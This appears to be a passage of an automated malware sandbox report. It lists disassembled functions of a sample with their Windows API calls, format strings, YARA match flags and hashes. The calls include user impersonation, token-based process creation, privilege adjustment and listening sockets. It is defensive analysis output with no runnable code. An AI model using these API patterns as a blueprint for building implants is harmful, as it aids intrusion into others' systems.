                • Instruction Fuzzy Hash: CD520730918F498EEB2CDB5CC4543BAB7D5FBB5304F28422FD897CB251D674D8468A8A
                Function 0349F823 Relevance: 29.0, APIs: 15, Strings: 1, Instructions: 1022COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                  • Part of subcall function 0349E89B: _getptd.LIBCMT ref: 0349E8B1
                  • Part of subcall function 0349E89B: __updatetlocinfo.LIBCMT ref: 0349E8E6
                  • Part of subcall function 0349E89B: __updatetmbcinfo.LIBCMT ref: 0349E90D
                • _errno.LIBCMT ref: 0349F889
                  • Part of subcall function 0349F013: _getptd_noexit.LIBCMT ref: 0349F017
                • _fileno.LIBCMT ref: 0349F8B6
                  • Part of subcall function 034A2D5B: _errno.LIBCMT ref: 034A2D64
                  • Part of subcall function 034A2D5B: _invalid_parameter_noinfo.LIBCMT ref: 034A2D6F
                • write_multi_char.LIBCMT ref: 0349FEE6
                • write_string.LIBCMT ref: 0349FF03
                • write_multi_char.LIBCMT ref: 0349FF20
                • write_string.LIBCMT ref: 0349FF7F
                • write_multi_char.LIBCMT ref: 0349FFD8
                • free.LIBCMT ref: 0349FFEC
                • _isleadbyte_l.LIBCMT ref: 034A00BD
                • write_char.LIBCMT ref: 034A00D3
                • write_char.LIBCMT ref: 034A00F4
                • _errno.LIBCMT ref: 034A01EE
                • _invalid_parameter_noinfo.LIBCMT ref: 034A01F9
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4095150845.0000000003480000.00000040.00001000.00020000.00000000.sdmp, Offset: 03480000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3480000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: _errnowrite_multi_char$_invalid_parameter_noinfowrite_charwrite_string$__updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexit_isleadbyte_lfree
                • String ID:
                • API String ID: 3613058218-3916222277
                • Opcode ID: ab974c686d4cf2a6d6f964f9f08ddbfde3681fa99218c6095000c369d33f032e
                • Instruction ID: d36a7c5203955588c7855b1369e0d9d58d085e1f5c3290d2456f7eb1d52cdb27
                • Opcode Fuzzy Hash: ab974c686d4cf2a6d6f964f9f08ddbfde3681fa99218c6095000c369d33f032e
                • Instruction Fuzzy Hash: 43523C31918F498EEF2CCB1CD8546BABBD5FBA5301F28422FD897CB251D634D847864A
                Function 038961C0 Relevance: 26.0, APIs: 10, Strings: 7, Instructions: 545COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • _snprintf.LIBCMT ref: 038963EE
                • _snprintf.LIBCMT ref: 0389640B
                • _snprintf.LIBCMT ref: 0389632D
                  • Part of subcall function 0389D57C: _errno.LIBCMT ref: 0389D5B3
                  • Part of subcall function 0389D57C: _invalid_parameter_noinfo.LIBCMT ref: 0389D5BE
                • _snprintf.LIBCMT ref: 03896660
                • _snprintf.LIBCMT ref: 038969BC
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: _snprintf$_errno_invalid_parameter_noinfo
                • String ID: %s%s$%s%s$%s%s: %s$%s&%s$%s&%s=%s$?%s$?%s=%s
                • API String ID: 3442832105-1222817042
                • Opcode ID: 1f56280164754b5557220eac88cc4c9762102babc9b28307cf2a7c73b7346fc6
                • Instruction ID: 48c8d17394d46a7466ef488f1c0ad426f3b575d89b0ddb223925e2b5e3131a07
                • Opcode Fuzzy Hash: 1f56280164754b5557220eac88cc4c9762102babc9b28307cf2a7c73b7346fc6
                • Instruction Fuzzy Hash: 6432C765614E8592FF15CBADE0012E9A3B0FF957A9F085142DF895BB24FF38D2A6C340
                Function 03890F28 Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 150filetimeCOMMON
                Download Yara Rule
                APIs
                • malloc.LIBCMT ref: 03890F5B
                  • Part of subcall function 0389D1C8: _FF_MSGBANNER.LIBCMT ref: 0389D1F8
                  • Part of subcall function 0389D1C8: _NMSG_WRITE.LIBCMT ref: 0389D202
                  • Part of subcall function 0389D1C8: HeapAlloc.KERNEL32 ref: 0389D21D
                  • Part of subcall function 0389D1C8: _callnewh.LIBCMT ref: 0389D236
                  • Part of subcall function 0389D1C8: _errno.LIBCMT ref: 0389D241
                  • Part of subcall function 0389D1C8: _errno.LIBCMT ref: 0389D24C
                  • Part of subcall function 0388CFCC: malloc.LIBCMT ref: 0388CFDF
                  • Part of subcall function 0388CFFC: htonl.WS2_32 ref: 0388D007
                • GetCurrentDirectoryA.KERNEL32 ref: 03890FD3
                • FindFirstFileA.KERNEL32 ref: 0389100C
                • GetLastError.KERNEL32 ref: 0389101B
                • free.LIBCMT ref: 03891056
                • free.LIBCMT ref: 03891063
                  • Part of subcall function 0389D188: HeapFree.KERNEL32 ref: 0389D19E
                  • Part of subcall function 0389D188: _errno.LIBCMT ref: 0389D1A8
                  • Part of subcall function 0389D188: GetLastError.KERNEL32 ref: 0389D1B0
                • FileTimeToSystemTime.KERNEL32 ref: 03891070
                • SystemTimeToTzSpecificLocalTime.KERNEL32 ref: 03891081
                • FindNextFileA.KERNEL32 ref: 0389113E
                • FindClose.KERNEL32 ref: 0389114F
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: Time$FileFind_errno$ErrorHeapLastSystemfreemalloc$AllocCloseCurrentDirectoryFirstFreeLocalNextSpecific_callnewhhtonl
                • String ID: %s$.\*$D0%02d/%02d/%02d %02d:%02d:%02d%s$F%I64d%02d/%02d/%02d %02d:%02d:%02d%s
                • API String ID: 723279517-1754256099
                • Opcode ID: dd787fa29133a0fd75daa2a63f366151dc49c673a2593fbac1e01e080f930c93
                • Instruction ID: ee6905781db849dad6654202525d43f17f681ced8a0eaf347267497f68475eac
                • Opcode Fuzzy Hash: dd787fa29133a0fd75daa2a63f366151dc49c673a2593fbac1e01e080f930c93
                • Instruction Fuzzy Hash: B551E47630875586EB10EFA6E84039EF7A5F385B94F444056EE4987B98EF7CC60ACB01
                Function 03890240 Relevance: 18.2, APIs: 12, Instructions: 157processCOMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • CreateProcessAsUserA.ADVAPI32 ref: 0389029B
                • GetLastError.KERNEL32 ref: 038902A9
                • GetLastError.KERNEL32 ref: 038902CD
                  • Part of subcall function 0388FA80: MultiByteToWideChar.KERNEL32 ref: 0388FAAD
                  • Part of subcall function 0388FA80: MultiByteToWideChar.KERNEL32 ref: 0388FAD5
                • CreateProcessA.KERNEL32 ref: 0389031F
                • GetLastError.KERNEL32 ref: 03890329
                • GetCurrentDirectoryW.KERNEL32 ref: 03890679
                • GetCurrentDirectoryW.KERNEL32 ref: 03890693
                • CreateProcessWithTokenW.ADVAPI32 ref: 038906D7
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: CreateErrorLastProcess$ByteCharCurrentDirectoryMultiWide$TokenUserWith
                • String ID:
                • API String ID: 3044875250-0
                • Opcode ID: ef855b0e09373d15b0c2c3b2916aafe651afc16b624a92ab55f267427aaf5471
                • Instruction ID: 27d9639f9284c775102e1dfde002438c42d4c86521c50ab8f66f68897992d3ef
                • Opcode Fuzzy Hash: ef855b0e09373d15b0c2c3b2916aafe651afc16b624a92ab55f267427aaf5471
                • Instruction Fuzzy Hash: A661C2B2214B44C6FB21DFA5E84435EB3A5F788B98F4881A6EA4D87B54CF3CC585CB11
                Function 0389780C Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 87fileCOMMON
                Download Yara Rule
                APIs
                • malloc.LIBCMT ref: 0389783B
                  • Part of subcall function 0389D1C8: _FF_MSGBANNER.LIBCMT ref: 0389D1F8
                  • Part of subcall function 0389D1C8: _NMSG_WRITE.LIBCMT ref: 0389D202
                  • Part of subcall function 0389D1C8: HeapAlloc.KERNEL32 ref: 0389D21D
                  • Part of subcall function 0389D1C8: _callnewh.LIBCMT ref: 0389D236
                  • Part of subcall function 0389D1C8: _errno.LIBCMT ref: 0389D241
                  • Part of subcall function 0389D1C8: _errno.LIBCMT ref: 0389D24C
                • _snprintf.LIBCMT ref: 03897853
                  • Part of subcall function 0389D57C: _errno.LIBCMT ref: 0389D5B3
                  • Part of subcall function 0389D57C: _invalid_parameter_noinfo.LIBCMT ref: 0389D5BE
                • FindFirstFileA.KERNEL32 ref: 0389785E
                • free.LIBCMT ref: 0389786A
                  • Part of subcall function 0389D188: HeapFree.KERNEL32 ref: 0389D19E
                  • Part of subcall function 0389D188: _errno.LIBCMT ref: 0389D1A8
                  • Part of subcall function 0389D188: GetLastError.KERNEL32 ref: 0389D1B0
                • malloc.LIBCMT ref: 038978BA
                • _snprintf.LIBCMT ref: 038978D2
                • free.LIBCMT ref: 038978FA
                • FindNextFileA.KERNEL32 ref: 03897913
                • FindClose.KERNEL32 ref: 03897924
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: _errno$Find$FileHeap_snprintffreemalloc$AllocCloseErrorFirstFreeLastNext_callnewh_invalid_parameter_noinfo
                • String ID: %s\*
                • API String ID: 2620626937-766152087
                • Opcode ID: b766a1522dcccdc6d8e5ae5440176dc1c71bb58c3c2772cf12c04a584ca98bc8
                • Instruction ID: 9e4fa8c1c16fc2aec79cb8ec328d25297214eeed730b31c70595c4cbeda04288
                • Opcode Fuzzy Hash: b766a1522dcccdc6d8e5ae5440176dc1c71bb58c3c2772cf12c04a584ca98bc8
                • Instruction Fuzzy Hash: A131C05621438649FE16DBA66C1036AEB29B38AFD0F4C81D2EEE55BB55CF3CC142C708
                Function 00401A70 Relevance: 12.0, APIs: 8, Instructions: 50COMMON
                Download Yara Rule
                APIs
                • RtlCaptureContext.KERNEL32 ref: 00401A84
                • RtlLookupFunctionEntry.KERNEL32 ref: 00401A9B
                • RtlVirtualUnwind.KERNEL32 ref: 00401ADD
                • SetUnhandledExceptionFilter.KERNEL32 ref: 00401B21
                • UnhandledExceptionFilter.KERNEL32 ref: 00401B2E
                • GetCurrentProcess.KERNEL32 ref: 00401B34
                • TerminateProcess.KERNEL32 ref: 00401B42
                • abort.MSVCRT ref: 00401B48
                Memory Dump Source
                • Source File: 00000000.00000002.4094583277.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.4094558739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4094583277.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4094629675.000000000040D000.00000080.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4094651561.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4094673415.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_k2vUsu5VZ5.jbxd
                Similarity
                • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentEntryFunctionLookupTerminateUnwindVirtualabort
                • String ID:
                • API String ID: 4278921479-0
                • Opcode ID: 27e43dfa7ef0e7d63c314b0127c2fc61b110ad3033d9dc91a01dad9a926d3ef7
                • Instruction ID: cf336b0ec7d2cb6baae35a739632777ca23f94a65b3f666190a75c6fcbb7d788
                • Opcode Fuzzy Hash: 27e43dfa7ef0e7d63c314b0127c2fc61b110ad3033d9dc91a01dad9a926d3ef7
                • Instruction Fuzzy Hash: B5210FB5202F45E9EB009B61F98438A33B4BB08B88F40452ADF8E27775EF38C519C708
                Function 03895100 Relevance: 9.1, APIs: 6, Instructions: 60networkCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: bindclosesockethtonsioctlsocketlistensocket
                • String ID:
                • API String ID: 1767165869-0
                • Opcode ID: 00106a6ad1e19a2568f5e355a5f7b5f41c24474b7da708c1ecfc5d75562f020d
                • Instruction ID: b9443c34a98900e47bd6b134a172c8b950fa8336d4646eb50b58269e15dd2ed3
                • Opcode Fuzzy Hash: 00106a6ad1e19a2568f5e355a5f7b5f41c24474b7da708c1ecfc5d75562f020d
                • Instruction Fuzzy Hash: 0211006270075482EB21CF46E80032AB365F388FA8F8846A6EE6A97B54CF3CD549C700
                Function 03894CF8 Relevance: 9.1, APIs: 6, Instructions: 57networkCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: bindclosesockethtonlhtonsioctlsocketsocket
                • String ID:
                • API String ID: 3910169428-0
                • Opcode ID: e5609d3337b011382687551e59e102a1dae304545505bb00b23c1231bff3c0b8
                • Instruction ID: ab6da1a6fff6886e8d33dbdb88c757132c6b0088aa4ebc4efee16bdd4bab2c1d
                • Opcode Fuzzy Hash: e5609d3337b011382687551e59e102a1dae304545505bb00b23c1231bff3c0b8
                • Instruction Fuzzy Hash: C71103B9310B4086EB54DF66E40439AB760F788BA4F598265DE6993790DF3CC64AC740
                Function 0389BEF0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                  • Part of subcall function 0389BC70: RevertToSelf.ADVAPI32 ref: 0389BC8D
                • LogonUserA.ADVAPI32 ref: 0389BF38
                • GetLastError.KERNEL32 ref: 0389BF42
                  • Part of subcall function 0389473C: malloc.LIBCMT ref: 03894758
                  • Part of subcall function 0388FA80: MultiByteToWideChar.KERNEL32 ref: 0388FAAD
                  • Part of subcall function 0388FA80: MultiByteToWideChar.KERNEL32 ref: 0388FAD5
                  • Part of subcall function 0388CFCC: malloc.LIBCMT ref: 0388CFDF
                • ImpersonateLoggedOnUser.ADVAPI32 ref: 0389BF60
                • GetLastError.KERNEL32 ref: 0389BF6A
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: ByteCharErrorLastMultiUserWidemalloc$ImpersonateLoggedLogonRevertSelf
                • String ID: %s\%s
                • API String ID: 3621627092-4073750446
                • Opcode ID: ce1ddc4cc406a6b86e948808d9d577ee996a93c47919ca10f4bbc8531711b80e
                • Instruction ID: d4d708c5f2020cc74af8e4599ce0b852706c61760af66e512c38acd39994f5e8
                • Opcode Fuzzy Hash: ce1ddc4cc406a6b86e948808d9d577ee996a93c47919ca10f4bbc8531711b80e
                • Instruction Fuzzy Hash: E331B224724F0086FB02EB96F89431A7368FB89BC4F4490A5E94D8BB54DF3CC6468751
                Function 0388F654 Relevance: 7.6, APIs: 5, Instructions: 61sleepCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: CountSleepTick$closesocket
                • String ID:
                • API String ID: 2363407838-0
                • Opcode ID: 33db7c2da52236c42fae74785d1bcb7574fb57a2df4d5ea3a285f2db53541465
                • Instruction ID: 597b2cd6cc9e79374ad481550acca2a067de9839c733bdaa890a8dc26c7aa5dc
                • Opcode Fuzzy Hash: 33db7c2da52236c42fae74785d1bcb7574fb57a2df4d5ea3a285f2db53541465
                • Instruction Fuzzy Hash: 1A11842560478442EA10FBAAF45425EA390F7C5BB4F4447A1DEBE8BBE4DF3CC6468701
                Function 00401990 Relevance: 7.6, APIs: 5, Instructions: 56timethreadCOMMON
                Download Yara Rule
                APIs
                • GetSystemTimeAsFileTime.KERNEL32 ref: 004019D5
                • GetCurrentProcessId.KERNEL32 ref: 004019E0
                • GetCurrentThreadId.KERNEL32 ref: 004019E8
                • GetTickCount.KERNEL32 ref: 004019F0
                • QueryPerformanceCounter.KERNEL32 ref: 004019FE
                Memory Dump Source
                • Source File: 00000000.00000002.4094583277.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.4094558739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4094583277.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4094629675.000000000040D000.00000080.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4094651561.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4094673415.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_k2vUsu5VZ5.jbxd
                Similarity
                • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                • String ID:
                • API String ID: 1445889803-0
                • Opcode ID: 180d7ae7fc5b59493381c36575e32c3318445472d573a77b1124f7da9349a765
                • Instruction ID: 088ae4e322ac71afa1741572681cd55a149c1471ea95f8004f9c9491386c013f
                • Opcode Fuzzy Hash: 180d7ae7fc5b59493381c36575e32c3318445472d573a77b1124f7da9349a765
                • Instruction Fuzzy Hash: AA1170A6756B1092FB209B25F90431973A0B788BF4F081A759F9D53BB4DA3CC986C708
                Function 0389CE10 Relevance: 7.6, APIs: 5, Instructions: 53networkCOMMONLIBRARYCODE
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: bindclosesockethtonslistensocket
                • String ID:
                • API String ID: 564772725-0
                • Opcode ID: 693a9b11f937d3efc85ee89bf6cc7c32527a322075b8e36231fcd70ee6315e40
                • Instruction ID: f58d4ea6e9c0a1b4620df8d9f3a90371f2d18096f8e9ef8622e525c358aa821c
                • Opcode Fuzzy Hash: 693a9b11f937d3efc85ee89bf6cc7c32527a322075b8e36231fcd70ee6315e40
                • Instruction Fuzzy Hash: E211E66661079586EE20DF55E81431EB374F784FE4F484666EEAA8BB94CF3DC105C704
                Function 0388FE7C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON
                Download Yara Rule
                APIs
                • LookupPrivilegeValueA.ADVAPI32 ref: 0388FEF6
                • AdjustTokenPrivileges.ADVAPI32 ref: 0388FF26
                • GetLastError.KERNEL32 ref: 0388FF30
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                • String ID: %s
                • API String ID: 4244140340-620797490
                • Opcode ID: 6c791bb4c01fc26c469951e3acf1c760b9cd35fe10ce13bee0a408dd74bcb015
                • Instruction ID: 139baf8982d284e2178902e873130af836d93d4e9128721d4571ba80900bb3c1
                • Opcode Fuzzy Hash: 6c791bb4c01fc26c469951e3acf1c760b9cd35fe10ce13bee0a408dd74bcb015
                • Instruction Fuzzy Hash: 31215E72B00B459AEB10DFB5E4447AD73B9E758B88F444496DE4CA7B48EF34C219C380
                Function 03893FA4 Relevance: 6.1, APIs: 4, Instructions: 73sleepnetworkCOMMON
                Download Yara Rule
                APIs
                • GetTickCount.KERNEL32 ref: 03893FCB
                • Sleep.KERNEL32 ref: 0389401A
                • GetTickCount.KERNEL32 ref: 03894020
                • WSAGetLastError.WS2_32 ref: 0389402A
                  • Part of subcall function 03894170: ioctlsocket.WS2_32 ref: 03894192
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: CountTick$ErrorLastSleepioctlsocket
                • String ID:
                • API String ID: 1121440892-0
                • Opcode ID: 5bf99a04f972f50d73caa8e18fab9a55977dc0de2e5c5f24fa58e569c163d702
                • Instruction ID: 21cd032f0a20e1a9115f0e699650919244fc576082acbdab2e0386815312a877
                • Opcode Fuzzy Hash: 5bf99a04f972f50d73caa8e18fab9a55977dc0de2e5c5f24fa58e569c163d702
                • Instruction Fuzzy Hash: E6317C3AB00B40C6EB10DBA6E4842AC77B9F388B94F4542A6DF6E97794CF30C516C340
                Function 0388D784 Relevance: 4.9, APIs: 3, Instructions: 397memoryCOMMONLIBRARYCODE
                Download Yara Rule
                APIs
                  • Part of subcall function 03894864: htonl.WS2_32 ref: 03894881
                • GetLastError.KERNEL32 ref: 0388DA74
                  • Part of subcall function 0389ADBC: GetCurrentProcess.KERNEL32 ref: 0389AE49
                • HeapCreate.KERNEL32 ref: 0388DA1B
                • HeapAlloc.KERNEL32 ref: 0388DA39
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: Heap$AllocCreateCurrentErrorLastProcesshtonl
                • String ID:
                • API String ID: 3419463915-0
                • Opcode ID: c3210aeb038c61ac2ac1f21ef91652db53eb4006541b35b7449dfd283ffbea81
                • Instruction ID: 303acc0358a1bb47b58d3c47b51a0a38d2999d1cb05ff913e05275302b6df9f2
                • Opcode Fuzzy Hash: c3210aeb038c61ac2ac1f21ef91652db53eb4006541b35b7449dfd283ffbea81
                • Instruction Fuzzy Hash: 1FE1C6B7710B4587EB24DBB9E88036A63A1F788754F088565DB8ADBB51EF3CE145C300
                Function 038AA270 Relevance: 3.4, Strings: 2, Instructions: 884COMMONLIBRARYCODE
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID: $<
                • API String ID: 0-428540627
                • Opcode ID: 58dc9353a9a7517b3c72d3f02fcc31b8c3ec0016d5ec06511f190bbd9e753e9c
                • Instruction ID: d266b07e34e8e3946292e052b0680392b939cce33c76d841d0b2cfafa3bfe8e2
                • Opcode Fuzzy Hash: 58dc9353a9a7517b3c72d3f02fcc31b8c3ec0016d5ec06511f190bbd9e753e9c
                • Instruction Fuzzy Hash: FB92E2B2325A8087DB58CB1DE4A173AB7A5F3C8B84F44512AEB9B87794CE3CD551CB04
                Function 0349D52F Relevance: 1.8, APIs: 1, Instructions: 304COMMONLIBRARYCODE
